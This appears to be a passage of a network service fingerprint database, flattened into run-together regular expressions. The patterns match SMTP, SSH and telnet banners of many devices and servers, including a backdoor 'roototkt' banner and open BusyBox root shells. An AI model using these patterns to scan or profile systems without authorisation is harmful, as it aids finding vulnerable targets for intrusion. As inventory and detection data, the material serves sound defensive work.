AVG ESMTP Proxy Server Beta - ([\d./]+) \[[\d.]+\]\r\n -220 AVG ESMTP Proxy Server ([\d./]+) \[[\d./]+\]\r\n -554 ([\d.]+) ([-\w_.]+) No mail service\r\n -220 Traffic Inspector SMTP Gate \(SPAM protected\), ver\. ([\w._-]+), ready at.*\r\n -220 mailwall SMTP Server \(Ikarus MailWall by David Grabenweger\) ready\r\n -220 ([-\w_.]+) ESMTP - eXpurgate ([\d.]+) \( -220 CCProxy ([\d.]+) SMTP Service Ready\(Unregistered\)\r\n -NoSpamToday! SMTP Proxy Monitoring Service Ready\.\r\n -220 ([-\w_.]+) ESMTP bitdefender -220 ([-\w_.]+) ESMTP BitDefender Proxy version ([^\r\n]+)\r\n -220 [-\w_.]+ avast! SMTP proxy ready\.\r\n -220 ([-\w_.]+) (SCM\d+)/SMTP Ready\.\r\n -554 You are not allowed to connect\.\r\n -220 ([\w._-]+) ESMTP Symantec Brightmail Gateway\r\n -220 ([\w._-]+) ESMTP server ready \(Alligate v([\w._-]+)\)(?: AUTH ONLY)?\r\n -220 ([\w._-]+)\.ARK Sendmail ready\. \r\n -421 too many connections\r\n -220 ([-\w_.]+) ESMTP Service ready\r\n -220 ([\w._-]+) AVKSMTP Server\r\n -220 (\S+) Welcome to SpamFilter for ISP SMTP Server v(\d\S+) -220[\s-].*?E?SMTP[^\r]*\r\n -550 (\d.\d.\d) ([^\r\n]+) -Statistics from .*\n M msgsfr bytes_from msgsto bytes_to msgsrej msgsdis Mailer\n -220 ([-.\w]+) SNPP server \(HylaFAX \(tm\) Version ([-.\w]+)\) ready.\r\n -220 QuickPage v(\d[-.\w]+) SNPP server ready at -250\r\nProtocol-Version:(\d[\d.]+)\r\nMessage-ID:\d+\r\nDatabase .*\r\nContent-Length:\d+\r\nKey Length:(\d+)\r\n\r\n.*(\w:\\.*ini)\r\n\r\n -SPMD_ACK\0\0\x01\0\x01 -SSH-([\d.]+)-([\d.]+) F-Secure SSH Windows NT Server\r?\n -SSH-([\d.]+)-([\d.]+) dss F-SECURE SSH\r?\n -SSH-([\d.]+)-([\d.]+) F-SECURE SSH.*\r?\n -SSH-([\d.]+)-ReflectionForSecureIT_([-\w_.]+) - Process Software MultiNet\r\n -SSH-([\d.]+)-ReflectionForSecureIT_([-\w_.]+)\r?\n -SSH-(\d[\d.]+)-SSH Protocol Compatible Server SCS (\d[-.\w]+)\r?\n -SSH-([\d.]+)-SSH Compatible Server\r?\n -SSH-([\d.]+)-([\d.]+) SSH Secure Shell Tru64 UNIX\r?\n -SSH-([\d.]+)-(\d+\.\d+\.\d+) SSH Secure Shell -sshd: SSH Secure Shell (\d[-.\w]+) on ([-.\w]+)\nSSH-(\d[\d.]+)- -sshd2\[\d+\]: .*\r\nSSH-([\d.]+)-(\d[-.\w]+) SSH Secure Shell \(([^\r\n\)]+)\)\r?\n -SSH-([\d.]+)-(\d+\.\d+\.[-.\w]+) -SSH-([\d.]+)-OpenSSH_([\w._-]+) Debian-(\S*maemo\S*)\r?\n -SSH-([\d.]+)-OpenSSH_([\w._-]+)[ -]{1,2}Debian[ -_]([^\r\n]+)\r?\n -SSH-([\d.]+)-OpenSSH_[\w.]+-FC-([\w.-]+)\.fc(\d+)\r\n -SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD-([\d]+)\r?\n -SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD localisations (\d+)\r?\n -SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD-openssh-portable-(?:[\w.,]+)\r?\n -SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD-openssh-portable-overwrite-base -SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD-openssh-gssapi- -SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD\n -SSH-([\d.]+)-OpenSSH_([\w._-]+) miniBSD-([\d]+)\r?\n -SSH-([\d.]+)-OpenSSH_([\w._-]+) NetBSD_Secure_Shell-([\w._-]+)\r?\n -SSH-([\d.]+)-OpenSSH_([\w._-]+)_Mikrotik_v([\d.]+)\r?\n -SSH-([\d.]+)-OpenSSH_([\w._-]+) in RemotelyAnywhere ([\d.]+)\r?\n -SSH-([\d.]+)-OpenSSH_([\w._-]+)\+CAN-2004-0175\r?\n -SSH-([\d.]+)-OpenSSH_([\w._-]+) NCSA_GSSAPI_20040818 KRB5\r?\n -SSH-([\d.]+)-OpenSSH_([\w._-]+-hpn\w+)\r?\n -SSH-([\d.]+)-OpenSSH_([\w._-]+\+sftpfilecontrol-v[\d.]+-hpn\w+)\r?\n -SSH-([\d.]+)-OpenSSH_([\w._-]+-hpn) NCSA_GSSAPI_\d+ KRB5\r?\n -SSH-([\d.]+)-OpenSSH_3\.4\+p1\+gssapi\+OpenSSH_3\.7\.1buf_fix\+2006100301\r?\n -SSH-([\d.]+)-OpenSSH_([\w._-]+\.RL)\r?\n -SSH-([\d.]+)-OpenSSH_([\w._-]+-CERN\d+)\r?\n -SSH-([\d.]+)-OpenSSH_([\w._-]+\.cern-hpn) -SSH-([\d.]+)-OpenSSH_([\w._-]+-hpn)\r?\n -SSH-([\d.]+)-OpenSSH_([\w._-]+-pwexp\d+)\r?\n -SSH-([\d.]+)-OpenSSH_([\w._-]+)-chrootssh\n -SSH-([\d.]+)-Nortel\r?\n -SSH-([\d.]+)-OpenSSH_([\w_.-]+) DragonFly-\d+\r?\n -SSH-([\d.]+)-OpenSSH_([\w_.-]+) FIPS\n -\0\0\0\\0\0\0\0\x01\0\0\0\x1bNo host key is configured!\n\r!\"v -SSH-(\d[\d.]+)-SSF-(\d[-.\w]+)\r?\n -SSH-(\d[\d.]+)-lshd_(\d[-.\w]+) lsh - a free ssh\r\n\0\0 -SSH-(\d[\d.]+)-lshd-(\d[-.\w]+) lsh - a GNU ssh\r\n\0\0 -SSH-([\d.]+)-Sun_SSH_(\S+) -SSH-([\d.]+)-meow roototkt by rebel -SSH-(\d[\d.]*)-(AKAMAI-I*)\r?\n -SSH-(\d[\d.]*)-(Server-V)\r?\n -SSH-(\d[\d.]*)-(Server-VI)\r?\n -SSH-(\d[\d.]*)-(Server-VII)\r?\n -SSH-(\d[\d.]+)-Cisco-(\d[\d.]+)\r?\n -\r\nDestination server does not have Ssh activated\.\r\nContact Cisco Systems, Inc to purchase a\r\nlicense key to activate Ssh\.\r\n -SSH-2\.0-0\.0 \r?\n -SSH-([\d.]+)-([\w.]+) VShell\r?\n -SSH-([\d.]+)-([\w.]+) \(beta\) VShell\r?\n -SSH-([\d.]+)-(\d[-.\w]+) sshlib: WinSSHD (\d[-.\w]+)\r?\n -SSH-([\d.]+)-(\d[-.\w]+) sshlib: WinSSHD\r?\n -SSH-([\d.]+)-([\w._-]+) sshlib: sshlibSrSshServer ([\w._-]+)\r\n -SSH-([\d.]+)-([\w._-]+) sshlib: GlobalScape\r?\n -SSH-([\d.]+)-([\w._-]+) sshlib: EdmzSshDaemon ([\w._-]+)\r\n -SSH-([\d.]+)-([\w._-]+) FlowSsh: WinSSHD ([\w._-]+)\r\n -SSH-([\d.]+)-([\w._-]+) FlowSsh: WinSSHD ([\w._-]+): free only for personal non-commercial use\r\n -SSH-([\d.]+)-([\w._-]+) FlowSsh: WinSSHD: free only for personal non-commercial use\r\n -SSH-1\.5-X\r?\n -Access to service sshd from [-\w_.]+@[-\w_.]+ has been denied\.\r\n -SSH-([\d.]+)-FortiSSH_([\d.]+)\r?\n -SSH-([\d.]+)-cryptlib\r?\n -SSH-2\.0-1\.0 Radware SSH \r?\n -SSH-2\.0-(\d{8,12})\r?\n -SSH-2\.0-Twisted\r?\n -SSH-2\.0-PGP\r?\n -SSH-([\d.]+)-libssh-([-\w.]+)\r?\n -SSH-([\d.]+)-HUAWEI-VRP([\d.]+)\r?\n -SSH-([\d.]+)-VRP-([\d.]+)\r?\n -SSH-([\d.]+)-lancom\r?\n -SSH-([\d.]+)-xxxxxxx\r?\n| p|Fortinet VPN/firewall sshd -SSH-([\d.]+)-AOS_SSH\r?\n -SSH-([\d.]+)-RedlineNetworksSSH_([\d.]+) Derived_From_OpenSSH-([\d.])+\r?\n -SSH-([\d.]+)-DLink Corp\. SSH server ver ([\d.]+)\r?\n -SSH-([\d.]+)-FreSSH\.([\d.]+)\r?\n -SSH-([\d.]+)-Neteyes-C-Series_([\d.]+)\r?\n -SSH-([\d.]+)-IPSSH-([\d.]+)\r?\n| p|Cisco/3com IPSSHd -SSH-([\d.]+)-DigiSSH_([\d.]+)\r?\n -SSH-([\d.]+)-0 Tasman Networks Inc\.\r?\n -SSH-([\d.]+)-([\w.]+)rad\r?\n -SSH-([\d.]+)-OpenSSH_([\d.]+) in DesktopAuthority ([\d.]+)\r?\n -SSH-1\.5-SSH\.0\.1\r?\n -SSH-([\d.]+)-Ingrian_SSH\r?\n -SSH-([\d.]+)-PSFTPd PE\. Secure FTP Server ready\r?\n -SSH-([\d.]+)-BlueArcSSH_([\d.]+)\r?\n -SSH-([\d.]+)-Zyxel SSH server\r?\n -SSH-([\d.]+)-paramiko_([\w._-]+)\r?\n -SSH-2\.0-SSH_0\.2\r?\n -SSH-([\d.]+)-CoreFTP-([\w._-]+)\r?\n -SSH-([\d.]+)-RomSShell_([\w._-]+)\r\n -Could not load host key\. Closing connection\.\.\. -SSH-([\d.]+)-WS_FTP-SSH_([\w._-]+)(?: FIPS)?\r\n -SSH-([\d.]+)-http://www\.sshtools\.com J2SSH \[SERVER\]\r\n -SSH-([\d.]+)-DraySSH_([\w._-]+)\n\n\rNo connection is available now\. Try again later! -SSH-([\d.]+)-Pragma FortressSSH ([\d.]+)\n -SSH-([\d.]+)-SysaxSSH_([\d.]+)\r\n -SSH-([\d.]+)-1\.00\r\n -SSH-([\d.]+)-Foxit-WAC-Server-([\d.]+ Build \d+)\n -SSH-([\d.]+)-ROSSSH\r\n -SSH-([\d.]+)-3Com OS-([\w._-]+ Release \w+)\n -SSH-([\d.]+)-3Com OS-3Com OS V([\w._-]+)\n -SSH-([\d.]+)-XXXX\r\n -SSH-([\d.]+)-xxx\r\n -SSH-([\d.]+)-OpenSSH_([\w._-]+)-HipServ\n -SSH-([\d.]+)-xlightftpd_release_([\w._-]+)\r\n -SSH-([\d.]+)-Serv-U_([\w._-]+)\r\n -SSH-([\d.]+)-CerberusFTPServer_([\w._-]+)\r\n -Soldat Admin Connection Established\.\r\nPassword request timed out\.\r\n -unknown command \r\nunknown command \r\n -\* OK SSP MagniComp SysInfo Server ([\w._-]+)\n -RPY \d \d \. \d \d+\r\nContent-Type: application/beep\+xml\r\n -\0\0\0\x0bSynergy\0\x01\0 -\x80\0\0\\0\0\0\x01I\xae\xeb\xc1\0\0\0\0\0\0\x05\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x04\0\0\0\" -USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND\n -You are not welcome to use (\w+) from [\w._-]+\.\n -welcome userid=\d+ servername=\"([^"]+)\" motd=\"\" forwarding=\d+ channels=\d+ operators=\d+ maxusers=\d+ protocol=\"([\d.]+)\"\r\n -\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f -\xff\xfd\x18\xff\xfb\x01\n\r\n\rPassword: -\xff\xfc\x01\r\nPlease type \[Return\] two times, to initialize telnet configuration\r\nFor HELP type \"\?\"\r\n> -\x1b\[H\x1b\[2JYou have connected to a FirstClass System\. Please login\.\.\.\r\nUserID: -\xff\xfb\x03\xff\xfb\x01\r\nCopyright \d+ Sun Microsystems, Inc\. All rights reserved\.\r\nUse is subject to license terms\.\r\n\r\n\r\nSun\(tm\) Advanced Lights Out Manager ([\d.]+) \(([\w._-]+)\)\r\n\r\nPlease login: -\xff\xfb\x01\xff\xfb\x01Connected to [-/.+\w]+!\r\n\r\nPassword: -220 SL4NT viewer service ready\r\n250 Currently connected channels: -\xff\xfb\x03\xff\xfb\0\xff\xfb\0\xff\xfd\0\xff.*\r\rFrontDoor (\d[-.\w]+)/ -\xff\xfb\x01\xff\xfb\x03\r\nOK\r\n -\xff\xfb\x03\xff\xfd\x03\xff\xfc\x06.*\nPrecidia Technologies\r\n([-.+\w]+) Remote Configuration\r\n\nPassword\? -\xff\xfb\x03\xff\xfd\x03\xff\xfb\x01WinCE/WBT Command Shell Version (\d[-.\w]+)\r\nSerial Number: (\w+) MAC Address: 0000(\w+)\r\nUUID: [-\w]+\r\nPassword: -\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\x1b\[2J\x1b\[Hname: -\xff\xfb\x01\n\r-> \x08\x08\x08\x08 \*\*\* EPSON Network Scanner Server \((.*)\) \*\*\*\n\r\n\r\x08\x08\x08\x08 \n\r -\xff\xfb\x01\r\nNetportExpress\(tm\) ([-/.+\w]+)\r\n.*\r\n\r\nlogin: -login: \xff\xfd\x03\xff\xfb\x03\xff\xfb\x01 -\xff\xfb\x01\r\npassword: -\xff\xfb\x01\xff\xfd\x18\xff\xfd# -\xff\xfb\x03\xff\xfb\x01\r\nPassword: -\x1b\[20;1H\r\n\r\x1b\[\?25h\x1b\[20;11H\x1b\[21;1HSession Terminated, Connect again\r\n\r\x1b\[\?25h\x1b\[21;1H\xff\xfd\x18\xff\xfb\x01\x1b\[2J\x1b\[\?7l\x1b\[[34];23r\x1b\[\?6l\x1b\[1;1H\x1b\[\?25l\x1b\[1;1HHP [-.\w]+ ProCurve Switch ([-.\w]+)\r\n\rFirmware revision ([-.\w]+)\r\n\r\r -\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n\r.*Procurve Wireless Access Point (\d+)\r\n -Check Point FireWall-1 Client Authentication Server running on [-.\w]+\r\n\r\xff\xfb\x01\xff\xfe\x01\xff\xfb\x03User: -\xff\xfb\x01\xff\xfb\x03\r\nUsername: -\xff\xfd%\xff\xfb\x01\xff\xfd\x03\xff\xfd\x1f\xff\xfd\0\xff\xfb\0 -\xff\xfd\x03\xff\xfb\x03\xff\xfd'\xff\xfd\x18\xff\xfb\0\xff\xfd\0\xff\xfb\x01\xff\xfe\x01GUI START\n -\xff\xfd'\xff\xfd\x18| p|IBM OS/400 telnetd| o|OS/400 -\xff\xfb\x03\xff\xfb\x01\x07HP JetDirect\r\nPassword is not set\r\n -\xff\xfb\x03\xff\xfb\x01\x07HP JetDirect\r\n\r\nEnter username: -\xff\xfd\x03\xff\xfb\x01\xff\xfd!| p|HP MPE/iX telnetd -\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\n\nIQinVision IQeye3 Version ([vV].*)\n\r\nType HELP -\xff\xfe%\xff\xfd\x18 -\r\nEfficient ([-.\w ]+) Router \(([-.\d/]+)\) v(\d[-.\w]+) Ready\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\xff\xfe\x01Login: -\r\nRaptor Firewall Secure Gateway\.\r\n -\r\nSynchronet BBS for Win32 Version (\d[-.\w]+)\r\n -\xff\xfd\x03\xff\xfb\x01\xff\xfb\x03\x1b\[1;1H\x1b\[2K\x1b\[2;1H\x1b\[2K\x1b\[3;1H\x1b.*BayStack ([-\w_.]+) .*HW:(\w+) FW:V([\d.]+) SW:V([\d.]+)\x1b -\xff\xfb\x01\x1b\[2J\x1b\[58259456;1H\x1b\[0m\x1b\[1;1H \*\*\*\*\* \*\*\* \* \* \*\*\*\*\* \*\*\*\*\*\*\*\*\* \*\*\* \*\*\*\*\* \* \*\x1b\[2;1H -\xff\xfb\x01\n\r\n.*Bay Networks (Bay[-.: \w]+)\n\r -Check Point FireWall-1 authenticated Telnet server running on -\xff\xfb\x01\r\n\rType \"\?\" at the command prompt for a list of commands\.\n\r.*Command-> -\xff\xfb\x01\x1b\[0m\x1b\[2J\x1b\[0m\x1b\[9;20HCopyright\(C\) 1995-99 D-Link Systems Inc\.\x1b\[13;30HUser Name\x1b\[14;30HPassword\x1b\[23;10HMAC Address:\x1b\[8;29H([-.\w]+) Console Program\x1b\[13;41H -\xff\xfa\x18\x01\xff\xf0\xff\xfb\x01\xff\xfb\x03Ambit Cable Router\r\n\r\nLogin: -\n\rVina Technologies (.*) \((\d[-.\w]+ build \d+)\) -\xff\xfd\x03\xff\xfb\x03\xff\xfb\x01\x1b\[0m\x1b\[1;1H\x1b\[2J\rD\r \n\r (DES-.*) Command Line Interface\n\r\n -\xff\xfb\x01\xff\xfb\x03\xff\xfc\x1f\n\r\n\rUser Access Verification\n\r\n\r\n\r\n\r\n\rShell version (\d\S+).*Maipu Communication Technology Co\. -\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\x1b.*Intel Corporation, ([-+. \w()]+) -\r\nFlowPoint/(.*) Ready\r\n.*\xff\xfb\x01\xff\xfb -Tenor Multipath Switch CDR Server\r\nConnected from IpAddr/Port# [\d.]+/\d+ to Port# \d+\r\nPassword: -\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\x0d\x0a\x0d\x0aCisco\x20Systems.*Console/Telnet Access of the ([-. \w]+) for Configuration Purposes -\xff\xfb\x01\n\r\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08 \x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08 -\r\n\r\nUser Access Verification\r\nPassword:\xff\xfb\x01 -\xff\xfb\x03\xff\xfb\x01\xff\xfb\x03\xff\xfb\x01.*\r\nUser Access Verification\r\n\r\nPassword: -\xff\xfb\x01\r\r\nUser Access Verification\r\r\n\r\r\nUsername: -\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\r\n\r\nCisco Systems Console\r\n -\xff\xfd\x18 -\xff\xfd\x18\xff\xfd\x1f\xff\xfd#\xff\xfd'\xff\xfd\ -\xff\xfb\x01\n\rUser Name : -\xff\xfd\ -\xff\xfb\x01\xff\xfb\x03\xff\xfe\x01\n\rlogin: -\xff\xfb\x03\xff\xfb\x01\xff\xfd\x1f\r\n\r\nUsername: -\xff\xfd\x18\xff\xfd \xff\xfd#\xff\xfd'\xff\xfd\| p|Openwall GNU/*/Linux telnetd -\xff\xfc\x01\r\nHP JetDirect\r\n\r\nPlease type \"\?\" for HELP, or \"/\" for current settings\r\n> -\xff\xfb\x01\xff\xfb\x03\r\nAXIS (\S+) TELNET -\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03.*?FORE\x20Systems,\x20FORE\x20ES-2810.*?Version (\d[\d\.-]+) -\xff\xfb\x03\xff\xfb\x01.*ForeRunner ES-3810.*Enter Username: -\xff\xfb\x01\r\nCopyright \(C\) 1999 by Extreme Networks\r\r\n -\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03.*?ES-1000\x20Fast\x20Ethernet\x20Switch\x20Console -\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\xff\xfb\x05\xff\xfd\x05Welcome to ([-\w_]+) Debug Terminal - \d*\n\r\n\r\n\rlogin: -\x1b\[0m\x1b\[2J\x1b\[01;28HCONEXANT SYSTEMS, INC\.\x1b\[02;19H ACCESS RUNNER ADSL CONSOLE PORT\x1b\[24;01H>>>\x1b\[24;01HLOGON PASSWORD>\x1b\[02;53H3\.\d+\x1b\[24;17H\x1b\[24;17H\x1b\[24;17H\x1b\[24;17H -\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\n\r\nWelcome on (.*)\r\n\r\n\r\nUsername: -\xff\xfb\x01\xff\xfd\x18\nTelnet Service on the PrintServer\n\n\rPassword: | p|Hawking/TRENDnet Print Server telnetd -\xff\xfb\x01\xff\xfb\x03\r\n\r\n Welcome to OpenVMS \(TM\) Alpha Operating System, Version V([\d.]+) \r\n\r\n\rUsername: -\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\xff\xfd\x18\xff\xfd\x1f\xff\xfd \xff\xfd!\x07\r\n\r\n Welcome to OpenVMS \(TM\) Alpha Operating System, Version V([-\w_.]+) \r\n\r\n\rUsername: -\xff\xfd\(| p|IBM OS/390 or SNA telnetd -\xff\xfb\r\nRemotelyAnywhere Telnet Server v([\d.]+)\r\n.*\r\n\r\n([-\w_. ]+) login\r\nuser name: -\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\xff\xfd\x1f\xff\xfd\x18([^\r\n]+)\r\nRemotelyAnywhere Telnet Server ([\d.]+)\r\n.*\r\n\r\n([-\w_. ]+) login\r\nuser name: -\r\nVxWorks login: \xff\xfb\x01 -\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\r\n\r\nSelect Access Level\r\n===================\r\n1 - Read-Only\r\n2 - Installer\r\n3 - Administrator\r\n13008 >>> -\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\nExterior router [-\w_.]+\r\nType: Cisco 2651\r\nModule: E3/T3 interface\r\n\r\n -\xff\xfe\x01\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\xff\xfd\x18Georgia SoftWorks Telnet Server for Windows NT/2000/XP/2003/Vista Ver\. ([-\w_.]+)\n\r -\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\r\n\r\nCisco Systems, Inc\. Console\r\n\r\n\r\n\r\r\n\r\nUsername: -\xff\xfb\x01\xff\xfb\x03\r\n\r\n\[ORiNOCO-AP-(\d+)[-\d]*\]> Please enter password: -\xff\xfb\xfd\xff\xfb\x01\n\r\n\rFabric OS \(tm\) Release v([\w.]+)\n\r\n\r -\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\n\nLantronix MSS100 Version V([\d.]+)/\d+\(\d+\)\n\r\nType HELP at the 'Local_2> ' prompt for assistance\.\n\r\n\r\n\nUsername> -\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\0\r\0\r\n\x07# \0 -\xff\xfb\x01OPTIBASE MGW5100 COMMAND LINE INTERFACE\r\n -PC Telnetd ([\d.]+)\r\n\r\nlogin: -rsconfig: port rose not active\n\xff\xfd\"\r\nLinuxNode v([\d.]+) \(([-\w_.]+)\)\r\n\r\nlogin: -\xff\xfd\"\r\nLinuxNode v([\d.]+) \(([-\w_.]+)\)\r\n\r\nlogin: -\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n\r\nBusyBox v([-\w_.]+) \([^)]+\) Built-in shell \(ash\)\r\nEnter 'help' for a list of built-in commands\.\r\n\r\n# -\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\n\r\nBusyBox v([-\w_.]+) \([^)]+\) Built-in shell \(ash\)\r\nEnter 'help' for a list of built-in commands\.\r\n\r\n/bin # -\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\n\r\nBusyBox v([-\w_.]+) \([^)]+\) built-in shell \(ash\)\r\nEnter 'help' for a list of built-in commands\.\r\n\r\nermittle die aktuelle TTY\r\ntty is \"/dev/pts/0\"\r\nConsole Ausgaben auf dieses Terminal umgelenkt\r\n# -\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\n\r\nBusyBox v([-\w_.]+) \(2006\.02\.15-21:18\+0000\) Built-in shell \(msh\)\r\nEnter 'help' for a list of built-in commands\.\r\n\r\n# -\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\nRouter> -\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nAmiNET\d+ login: -\xff\xfb\x03\xff\xfb\x01\r\n\r\n\x07HP (\w+) Ethernet SNMP Module\r\n ROM B\.([\d.]+)\r\n EEPROM A\.([\d.]+)\r\n HW B\.([\d.]+)\r\n\r\nEnter password: -USR5450 Telnet server v([\d.]+)\n\r\nPassword : -\xff\xfd\x03\xff\xfb\x03\xff\xfd\x01\xff\xfb\x01\d\d-\w+-\d+ \d\d:\d\d:\d\d %MSCM-I-NEWTERM: New TELNET connection from (?:[\d.]+)\r\r\nPassword: -\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\0\n\nLantronix ETS16 Version V([\d.]+)/\d+\(\d+\)\n\r\0\nType HELP at the 'BRTR-ETS16>' prompt for assistance\.\n\r\0\nUsername> -\r\nWelcome to slush\. \(Version ([\d.]+)\)\r\n\r\n\r\n\xff\xfb\x01\xff\xfb\x03([-\w_. ]+) login: -\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\x1b\[0m\x1b\[2J\x1b\[0m\x1b\[2J\x1b\[2;66H\x1b\[1m\x1b\[21;1H\x1b\[0m-+\x1b\[22;2H\x1b\[0mFunction:\x1b\[23;2H\x1b\[0mMessage:\x1b\[24;2H\x1b\[7mCTRL\+R = Refresh +\x1b\[8;12H\x1b\[0mIBM BladeCenter 4-Port Gb Ethernet Switch Module Console -\xff\xfb\x01\xff\xfe\x01\xff\xfd\x03\xff\xfb\x03\x1b\[0;1H\x1b\[J\x1b\[1;1H\x1b\[0;1H\x1b\[J\x1b\[1;1H\x1b\[0m =+\r\n AT-8326GB Management System Version ([\d.]+) \r\n Remote - Telnet\r\n -\r\nEfficient 5851 SDSL \[ATM\] Router \(5851-\d+\) v([-\d.]+) Ready\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\xff\xfe\x01Login: -NPC Telnet permit one connection\.\r\n But One connection\(\) already keep alive\.\r\nGood Bye !! \r\n -\xff\xfb\x01\r\nWelcome to NetLinx v([\d.]+) Copyright AMX Corp\. \d+-\d+\r\n> -\r\nSiemens \d+ T1E1 \[COMBO\] Router \(([-\d]+)\) v([\d.]+) Ready\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\xff\xfe\x01Username: -\xff\xfd\x18\xff\xfb\x01\x1b\[2J\x1b\[\?7l\x1b\[4;23r\x1b\[\?6l\x1b\[1;1H\x1b\[\?25l\x1b\[1;1HCopyright \(C\) 1991-1994 Hewlett-Packard Co\. All Rights Reserved\. -\xff\xfc\x01\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfb\x18\xff\xfd\x1f\xff\xfb\x1f\xff\xfb\"\xff\xfb\x05\r\nCLI access not allowed until the SCC is active\.\r\n\r\n -\xff\xfb\x01\n?\r\n\r?VxWorks login: -\xff\xfb\x03\xff\xfb\x01\xff\xfd\x1f\r\nVxWorks login: -\xff\xfb\x01\r\n\rPassword: | p|ZyXEL Prestige/Efficient Speedstream adsl router telnetd -\xff\xfb\x03\xff\xfb\x01password: -\r\n\xff\xfb\x01Enter password: -\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\w+ login: -\xff\xfb\x01\xff\xfb\x03\r\n\(\w+\) \r\nUser: -login: \xff\xfb\x01\xff\xfb\x03| p|USRobotics/Sagem router telnetd -\xff\xfb\x01\xff\xfb\x03\xff\xfb\0\xff\xfd\0login: -220 FTP server \(ver 1\.0\) ready\.\r\n -\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nBusyBox on dslmodem login: -\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\xff\xfd\x1f\xff\xfd\x18 -\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nlogin: -\r\nSystem unavailable\. Please try later\.\r\n -\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n(FVS\w+) login: -\xff\xfb\0\xff\xfd\0\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03Login Name: -\xff\xfb\x01\xff\xfe\"\r\n\* -\xff\xfb\x03\xff\xfb\x01\r\n Disconnecting\.\.\.\r\n\n -\xff\xfb\x01\xff\xfb\x03\x1b\[2J\x1b\[0;0H\x1b\[K\x1b\[7mTelnet configuration RELEASE ([\d.]+)\x1b -Telnet server disabled\r\n -\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n login: -\xff\xfd\x01\xff\xfd\x1f\xff\xfb\x01\xff\xfb\x03\r\r\n([\w._-]+) login: -\xff\xfd\x01\xff\xfd\x1f\xff\xfb\x01\xff\xfb\x03([\w._-]+) login: -\r\n.*Based\(loosely\) on CircleMUD ([\d.]+) -\r\n.*Based on CircleMUD ([\w._-]+),\r\n -\x1b\[0;37;40m\x1b\[2J\x1b\[0;37;40m\x1b\[1m\x1b\[15;22HAT-(\w+), version ([\d.]+)\x1b -\xff\xfb\x01\xff\xfe\x01\xff\xfd\x03\xff\xfb\x03\x1b\[0;0H\x1b\[0J\x1b\[0;0H\x1b\[0J\x1b\[1;28HAT-([-\w_.]+) Login Menu\x1b\[5;18HAT-[-\w_.]+ Local Management System Version ([\d.]+) \x1b -\xff\xfd\x03\xff\xfb\x01\x1b\[2J\x1b\[1;1H\x1b\[0m\x1b\[\?3l\x1b\(0\x1b\[2;40H\x1b\(B\x1b\(0\x1b\[2;28H\x1b\(BCSX([-\w_.]+) Local Management\x1b\[0m\x1b\(0\x1b\[5;24H\x1b\(BCABLETRON Systems, Incorporated\x1b -\xff\xfb\x01\n\rno data rcvd for version string\n\rrecv version id unsuccessful\n\rSSH Session task 0x\w+: Version Exchange Failed\n\r -\r\nSorry, this system is engaged\.\r\n -\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nBusyBox on \(none\) login: -\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nBusyBox on ([-\w_.]+) login: -\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\n\r\nBusyBox v([-\w_.]+) \( 